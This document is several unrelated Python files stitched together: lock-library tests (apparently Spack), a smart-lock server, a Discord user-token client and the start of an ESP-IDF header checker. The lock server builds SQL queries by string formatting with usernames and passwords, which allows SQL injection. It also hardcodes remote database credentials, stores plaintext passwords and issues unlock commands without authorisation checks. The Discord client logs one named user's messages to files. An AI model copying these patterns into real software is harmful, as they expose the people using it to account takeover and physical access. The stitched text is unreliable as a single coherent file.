# Test that exclusive locks time out when shared locks are held.
#
def test_write_lock_timeout_on_read(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_3(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges_2(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_read_ranges_3(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
AcquireRead(lock_path, 10, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 10, 1))
def test_write_lock_timeout_on_read_ranges_4(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 64),
TimeoutWrite(lock_path, 10, 1),
TimeoutWrite(lock_path, 32, 1))
def test_write_lock_timeout_on_read_ranges_5(lock_path):
multiproc_test(
AcquireRead(lock_path, 64, 128),
TimeoutWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 127, 1),
TimeoutWrite(lock_path, 90, 10))
#
# Test that exclusive locks time while lots of shared locks are held.
#
def test_write_lock_timeout_with_multiple_readers_2_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 0.5, 10),
TimeoutWrite(lock_path, 5, 5))
def test_write_lock_timeout_with_multiple_readers_2_3_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 5, 15),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 11, 3),
TimeoutWrite(lock_path, 7, 1))
def test_write_lock_timeout_with_multiple_readers_3_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 0, 15))
def test_write_lock_timeout_with_multiple_readers_3_2_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 3, 10),
TimeoutWrite(lock_path, 5, 1))
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_on_read_only_lockfile(lock_dir, lock_path):
"""read-only directory, read-only lockfile."""
touch(lock_path)
with read_only(lock_path, lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.LockROFileError):
with lk.WriteTransaction(lock):
pass
def test_read_lock_read_only_dir_writable_lockfile(lock_dir, lock_path):
"""read-only directory, writable lockfile."""
touch(lock_path)
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_no_lockfile(lock_dir, lock_path):
"""read-only directory, no lockfile (so can't create)."""
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with pytest.raises(lk.CantCreateLockError):
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.CantCreateLockError):
with lk.WriteTransaction(lock):
pass
def test_upgrade_read_to_write(private_lock_path):
"""Test that a read lock can be upgraded to a write lock.
Note that to upgrade a read lock to a write lock, you have the be the
only holder of a read lock. Client code needs to coordinate that for
shared locks. For this test, we use a private lock just to test that an
upgrade is possible.
"""
# ensure lock file exists the first time, so we open it read-only
# to begin wtih.
touch(private_lock_path)
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.acquire_write()
assert lock._reads == 1
assert lock._writes == 1
assert lock._file.mode == 'r+'
lock.release_write()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.release_read()
assert lock._reads == 0
assert lock._writes == 0
assert lock._file is None
@pytest.mark.skipif(
os.environ.get('SPACK_TEST_SOLVER') == 'clingo',
reason='Test for Clingo are run in a container with root permissions'
)
def test_upgrade_read_to_write_fails_with_readonly_file(private_lock_path):
"""Test that read-only file can be read-locked but not write-locked."""
# ensure lock file exists the first time
touch(private_lock_path)
# open it read-only to begin wtih.
with read_only(private_lock_path):
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r'
# upgrade to writ here
with pytest.raises(lk.LockROFileError):
lock.acquire_write()
class ComplexAcquireAndRelease(object):
def __init__(self, lock_path):
self.lock_path = lock_path
def p1(self, barrier):
lock = lk.Lock(self.lock_path)
lock.acquire_write()
barrier.wait() # ---------------------------------------- 1
# others test timeout
barrier.wait() # ---------------------------------------- 2
lock.release_write() # release and others acquire read
barrier.wait() # ---------------------------------------- 3
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
lock.acquire_read()
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write and read
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p2(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
# others release reads
barrier.wait() # ---------------------------------------- 5
lock.acquire_write() # upgrade read to write
barrier.wait() # ---------------------------------------- 6
# others test timeout
barrier.wait() # ---------------------------------------- 7
lock.release_write() # release read AND write (need both)
lock.release_read()
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p3(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write & read
barrier.wait() # ---------------------------------------- 8
lock.acquire_read()
barrier.wait() # ---------------------------------------- 9
lock.acquire_write()
barrier.wait() # ---------------------------------------- 10
# others test timeout
barrier.wait() # ---------------------------------------- 11
lock.release_read() # release read AND write in opposite
lock.release_write() # order from before on p2
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
#
# Longer test case that ensures locks are reusable. Ordering is
# enforced by barriers throughout -- steps are shown with numbers.
#
def test_complex_acquire_and_release_chain(lock_path):
test_chain = ComplexAcquireAndRelease(lock_path)
multiproc_test(test_chain.p1,
test_chain.p2,
test_chain.p3)
class AssertLock(lk.Lock):
"""Test lock class that marks acquire/release events."""
def __init__(self, lock_path, vals):
super(AssertLock, self).__init__(lock_path)
self.vals = vals
# assert hooks for subclasses
assert_acquire_read = lambda self: None
assert_acquire_write = lambda self: None
assert_release_read = lambda self: None
assert_release_write = lambda self: None
def acquire_read(self, timeout=None):
self.assert_acquire_read()
result = super(AssertLock, self).acquire_read(timeout)
self.vals['acquired_read'] = True
return result
def acquire_write(self, timeout=None):
self.assert_acquire_write()
result = super(AssertLock, self).acquire_write(timeout)
self.vals['acquired_write'] = True
return result
def release_read(self, release_fn=None):
self.assert_release_read()
result = super(AssertLock, self).release_read(release_fn)
self.vals['released_read'] = True
return result
def release_write(self, release_fn=None):
self.assert_release_write()
result = super(AssertLock, self).release_write(release_fn)
self.vals['released_write'] = True
return result
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
# assert enter_fn is called while lock is held
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
# assert exit_fn is called while lock is held
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=enter_fn, release=exit_fn):
assert vals['acquired_%s' % type]
assert not vals['released_%s' % type]
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['acquired_%s' % type]
assert vals['released_%s' % type]
assert not vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_exception(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
return exit_result
exit_result = False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with pytest.raises(Exception):
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
# test suppression of exceptions from exit_fn
exit_result = True
vals.clear()
# should not raise now.
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_context_manager(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_read(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
def assert_acquire_write(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_write(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
class TestContextManager(object):
def __enter__(self):
vals['entered_ctx'] = True
def __exit__(self, t, v, tb):
assert not vals['released_%s' % type]
vals['exited_ctx'] = True
vals['exception_ctx'] = (t or v or tb)
return exit_ctx_result
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception_fn'] = (t or v or tb)
return exit_fn_result
exit_fn_result, exit_ctx_result = False, False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=TestContextManager, release=exit_fn):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
vals.clear()
with transaction(lock, acquire=TestContextManager):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
# below are tests for exceptions with and without suppression
def assert_ctx_and_fn_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
else:
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert vals['exception_ctx']
assert vals['exception_fn']
def assert_only_ctx_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(lock, acquire=TestContextManager):
raise Exception()
else:
with transaction(lock, acquire=TestContextManager):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert vals['exception_ctx']
assert not vals['exception_fn']
# no suppression
assert_ctx_and_fn_exception(raises=True)
assert_only_ctx_exception(raises=True)
# suppress exception only in function
exit_fn_result, exit_ctx_result = True, False
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=True)
# suppress exception only in context
exit_fn_result, exit_ctx_result = False, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
# suppress exception in function and context
exit_fn_result, exit_ctx_result = True, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
def test_nested_write_transaction(lock_path):
"""Ensure that the outermost write transaction writes."""
def write(t, v, tb):
vals['wrote'] = True
vals = collections.defaultdict(lambda: False)
lock = AssertLock(lock_path, vals)
# write/write
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write
vals.clear()
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert vals['wrote']
# write/read/write
vals.clear()
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write/read/write
vals.clear()
with lk.ReadTransaction(lock):
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
def test_nested_reads(lock_path):
"""Ensure that write transactions won't re-read data."""
def read():
vals['read'] += 1
vals = collections.defaultdict(lambda: 0)
lock = AssertLock(lock_path, vals)
# read/read
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/read/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write/read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
class LockDebugOutput(object):
def __init__(self, lock_path):
self.lock_path = lock_path
self.host = socket.getfqdn()
def p1(self, barrier, q1, q2):
# exchange pids
p1_pid = os.getpid()
q1.put(p1_pid)
p2_pid = q2.get()
# set up lock
lock = lk.Lock(self.lock_path, debug=True)
with lk.WriteTransaction(lock):
# p1 takes write lock and writes pid/host to file
barrier.wait() # ------------------------------------ 1
assert lock.pid == p1_pid
assert lock.host == self.host
# wait for p2 to verify contents of file
barrier.wait() # ---------------------------------------- 2
# wait for p2 to take a write lock
barrier.wait() # ---------------------------------------- 3
# verify pid/host info again
with lk.ReadTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == self.host
assert lock.pid == p2_pid
assert lock.host == self.host
barrier.wait() # ---------------------------------------- 4
def p2(self, barrier, q1, q2):
# exchange pids
p2_pid = os.getpid()
p1_pid = q1.get()
q2.put(p2_pid)
# set up lock
lock = lk.Lock(self.lock_path, debug=True)
# p1 takes write lock and writes pid/host to file
barrier.wait() # ---------------------------------------- 1
# verify that p1 wrote information to lock file
with lk.ReadTransaction(lock):
assert lock.pid == p1_pid
assert lock.host == self.host
barrier.wait() # ---------------------------------------- 2
# take a write lock on the file and verify pid/host info
with lk.WriteTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == self.host
assert lock.pid == p2_pid
assert lock.host == self.host
barrier.wait() # ------------------------------------ 3
# wait for p1 to verify pid/host info
barrier.wait() # ---------------------------------------- 4
def test_lock_debug_output(lock_path):
test_debug = LockDebugOutput(lock_path)
q1, q2 = Queue(), Queue()
local_multiproc_test(test_debug.p2, test_debug.p1, extra_args=(q1, q2))
def test_lock_with_no_parent_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
lock = lk.Lock('foo/bar/baz/lockfile')
with lk.WriteTransaction(lock):
pass
def test_lock_in_current_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
# test we can create a lock in the current directory
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
# and that we can do the same thing after it's already there
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
def test_attempts_str():
assert lk._attempts_str(0, 0) == ''
assert lk._attempts_str(0.12, 1) == ''
assert lk._attempts_str(12.345, 2) == ' after 12.35s and 2 attempts'
def test_lock_str():
lock = lk.Lock('lockfile')
lockstr = str(lock)
assert 'lockfile[0:0]' in lockstr
assert 'timeout=None' in lockstr
assert '#reads=0, #writes=0' in lockstr
def test_downgrade_write_okay(tmpdir):
"""Test the lock write-to-read downgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_write()
lock.downgrade_write_to_read()
assert lock._reads == 1
assert lock._writes == 0
def test_downgrade_write_fails(tmpdir):
"""Test failing the lock write-to-read downgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_read()
msg = 'Cannot downgrade lock from write to read on file: lockfile'
with pytest.raises(lk.LockDowngradeError, match=msg):
lock.downgrade_write_to_read()
@pytest.mark.parametrize("err_num,err_msg",
[(errno.EACCES, "Fake EACCES error"),
(errno.EAGAIN, "Fake EAGAIN error"),
(errno.ENOENT, "Fake ENOENT error")])
def test_poll_lock_exception(tmpdir, monkeypatch, err_num, err_msg):
"""Test poll lock exception handling."""
def _lockf(fd, cmd, len, start, whence):
raise IOError(err_num, err_msg)
with tmpdir.as_cwd():
lockfile = 'lockfile'
lock = lk.Lock(lockfile)
touch(lockfile)
monkeypatch.setattr(fcntl, 'lockf', _lockf)
if err_num in [errno.EAGAIN, errno.EACCES]:
assert not lock._poll_lock(fcntl.LOCK_EX)
else:
with pytest.raises(IOError, match=err_msg):
lock._poll_lock(fcntl.LOCK_EX)
def test_upgrade_read_okay(tmpdir):
"""Test the lock read-to-write upgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_read()
lock.upgrade_read_to_write()
assert lock._reads == 0
assert lock._writes == 1
def test_upgrade_read_fails(tmpdir):
"""Test failing the lock read-to-write upgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_write()
msg = 'Cannot upgrade lock from read to write on file: lockfile'
with pytest.raises(lk.LockUpgradeError, match=msg):
lock.upgrade_read_to_write()
|
server.py
|
'''
Main script: server handling client/lock connection
Usage: Set the IP-address to the server's IP-address.
Launch the lock before logging in with the client.
'''
import socket
import sys
import os
from threading import *
import mysql.connector
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
LOGINS = []
class Database:
"""Used to access database"""
def __init__(self, ip, username, password, database):
self.lockdb = mysql.connector.connect(
host=ip,
user=username,
passwd=password,
database=database
)
self.lockdbcursor = self.lockdb.cursor()
def is_valid_login(self, username, password):
query = "SELECT password FROM accounts WHERE username='{0}'"
self.lockdbcursor.execute(query.format(username))
lockdbresult = self.lockdbcursor.fetchall()
for x in lockdbresult:
if x[0] == password:
return True
return False
def get_lock_addresses(self, username):
lock_addresses = []
query = "SELECT interfaceip, port FROM accounts WHERE username='{0}'"
self.lockdbcursor.execute(query.format(username))
lockdbresult = self.lockdbcursor.fetchall()
for lock_address in lockdbresult:
lock_addresses.append(lock_address)
return lock_addresses
def get_lock_address_by_interface(self, interface):
query = "SELECT interfaceip, port FROM accounts WHERE interface='{0}'"
self.lockdbcursor.execute(query.format(interface))
lockdbresult = self.lockdbcursor.fetchall()
lock_address = lockdbresult[0]
return lock_address
def is_unique_name(self, username):
query = "SELECT username FROM accounts"
self.lockdbcursor.execute(query.format(username))
lockdbresult = self.lockdbcursor.fetchall()
for x in lockdbresult:
if x[0] == username:
return False
return True
def does_lock_exist(self, interface):
query = "SELECT interface FROM accounts"
self.lockdbcursor.execute(query)
lockdbresult = self.lockdbcursor.fetchall()
for x in lockdbresult:
if x[0] == interface:
return True
return False
def insert_account(self, username, password, interface, lock_address):
query = "INSERT INTO accounts (username, password, interface, interfaceip, port) VALUES ('{0}', '{1}', '{2}', '{3}', {4});"
self.lockdbcursor.execute(query.format(username, password, interface, lock_address[0], lock_address[1]))
self.lockdb.commit()
def get_lockname(self, lock_address):
query = "SELECT lockname FROM accounts WHERE interfaceip='{0}' AND port={1};"
self.lockdbcursor.execute(query.format(lock_address[0], lock_address[1]))
lockdbresult = self.lockdbcursor.fetchall()
return lockdbresult[0][0]
def change_username(self, lockname, lock_address):
try:
query = "UPDATE accounts SET lockname='{0}' WHERE interfaceip='{1}' AND port={2};"
self.lockdbcursor.execute(query.format(lockname, lock_address[0], lock_address[1]))
self.lockdb.commit()
return "CHANGE SUCCEEDED"
except Exception as e:
print(e)
return "CHANGE FAILED"
class Client:
"""Handle a client"""
def __init__(self, client_sock, client_address, lock_addresses, username, database):
self.client_sock = client_sock
self.client_address = client_address
self.lock_addresses = lock_addresses
self.username = username
self.database = database
def client_handler(self):
global LOGINS
print("Started server handler")
try:
while True:
self.lock_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data = self.client_sock.recv(1024)
data = data.decode().split()
print(data)
locknumber = int(data[1])
if data[0] == "STATE":
self.get_state(locknumber)
elif data[0] == "LOCK":
self.lock_sock.connect(self.lock_addresses[locknumber])
request = "#SLOT,LOCK%"
self.lock_sock.sendall(bytes(request, 'utf8'))
data = self.lock_sock.recv(1024)
self.lock_sock.close()
self.client_sock.sendall(data)
elif data[0] == "UNLOCK":
self.lock_sock.connect(self.lock_addresses[locknumber])
request = "#SLOT,OPEN%"
self.lock_sock.sendall(bytes(request, 'utf8'))
data = self.lock_sock.recv(1024)
self.lock_sock.close()
self.client_sock.sendall(data)
elif data[0] == "CHANGENAME":
lockname = self.client_sock.recv(1024).decode()
result = self.database.change_username(lockname, self.lock_addresses[locknumber])
print(lockname)
print(result)
self.client_sock.sendall(bytes(result, 'utf8'))
else:
self.client_sock.close()
LOGINS.remove(self.username)
print(self.username + " disconnected")
break
except Exception as e:
print(e)
self.client_sock.close()
LOGINS.remove(self.username)
print(self.username + " disconnected")
def get_state(self, locknumber):
self.lock_sock.connect(self.lock_addresses[locknumber])
self.lock_sock.send(bytes("#STATUS,SLOT%", 'utf8'))
state = self.lock_sock.recv(1024)
self.client_sock.sendall(state)
confirm = self.client_sock.recv(1024)
lockname = self.database.get_lockname(self.lock_addresses[locknumber])
print(lockname)
self.client_sock.sendall(bytes(lockname, 'utf8'))
def create_server(IP, SERVERPORT):
sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (IP, SERVERPORT)
sck.bind(server_address)
sck.listen(5)
return sck
def create_account(username, password, interface, database):
if database.is_unique_name(username):
if database.does_lock_exist(interface):
lock_address = database.get_lock_address_by_interface(interface)
database.insert_account(username, password, interface, lock_address)
return "CREATION SUCCEEDED"
else:
return "CREATION FAILED"
else:
return "CREATION FAILED"
def main():
global LOGINS
IP = config.get('main', 'serverip')
SERVERPORT = 10000
sock = create_server(IP, SERVERPORT)
database = Database('remotemysql.com', 'SpHsyQhe9K', 'fYrMfTbqN2', 'SpHsyQhe9K')
while True:
client_sock, client_address = sock.accept()
print("Connection created ")
print(client_address[0])
print(client_address[1])
identifier = client_sock.recv(1024)
print("packet received: identifier")
identifier = identifier.decode().split()
if identifier[0] == "LOGIN":
username = identifier[1]
password = identifier[2]
print(username + " connected")
if database.is_valid_login(username, password):
if username not in LOGINS:
lock_addresses = database.get_lock_addresses(username)
locks = str(len(lock_addresses))
client_sock.sendall(bytes("LOGINSUCCEEDED " + locks, 'utf8'))
client = Client(client_sock, client_address, lock_addresses, username, database)
LOGINS.append(username)
t = Thread(target=client.client_handler, args=())
t.start()
else:
print(username + " already logged in")
client_sock.sendall(bytes("LOGINFAILED", 'utf8'))
client_sock.close()
else:
client_sock.sendall(bytes("LOGINFAILED", 'utf8'))
client_sock.close()
if identifier[0] == "REGISTER":
creation_result = create_account(identifier[1], identifier[2], identifier[3], database)
client_sock.sendall(bytes(creation_result, 'utf8'))
if __name__ == '__main__':
main()
|
main.py
|
from concurrent.futures import thread
import json
import os
import sys
import threading
import time
import webbrowser
import webview
import client
import dotenv
import flask
from flask_socketio import SocketIO, emit, join_room, leave_room, \
close_room, rooms, disconnect
env = dotenv.load_dotenv() #load env
token = os.environ.get("DISCORD_TOKEN")
app = flask.Flask(__name__)
socketio = SocketIO(app)
gateway = client.Gateway() #init discord gateway
user = client.User() #init discord http api
gateway.connect() #connect to ws://gateway.discord.gg
gateway.identify(token) #identify token
gateway.heartbeat(gateway.heartbeat_interval) #start heartbeat loop
_ready = False #gateway ready status
user.identify(token) #identify user token
dms = []
#listen events from websocket
index = [0]
@gateway.listener("MESSAGE_CREATE")
def new_message(event):
name = event["d"]["author"]["username"] + "#" + event["d"]["author"]["discriminator"]
message = event["d"]["content"]
if name == "yki#8153":
json.dump(event, open(f"{index[0]}.json", "w"))
index[0] += 1
@gateway.listener("READY")
def ready(event):
global _ready
dms = user.fetch_dms(event)
socketio.emit("ready", dms, broadcast=True)
json.dump(event, open("ready.json", "w"))
_ready = True
gateway.listen() #start event listen loop
@app.route("/")
def index():
return flask.render_template("app.html")
if __name__ == "__main__":
webview.create_window('YiCord', 'http://127.0.0.1:5544', width=1000, height=600, text_select=True)
threading.Thread(target=socketio.run, args=(app, "127.0.0.1", 5544), daemon=True).start()
webview.start()
|
check_public_headers.py
|
#!/usr/bin/env python
#
# Checks all public headers in IDF in the ci
#
# Copyright 2020 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import unicode_literals
import re
import os
import subprocess
import json
import fnmatch
import argparse
import queue
from threading import Thread, Event
import tempfile
class HeaderFailed(Exception):
"""Base header failure exeption"""
pass
class HeaderFailedSdkconfig(HeaderFailed):
def __str__(self):
return "Sdkconfig Error"
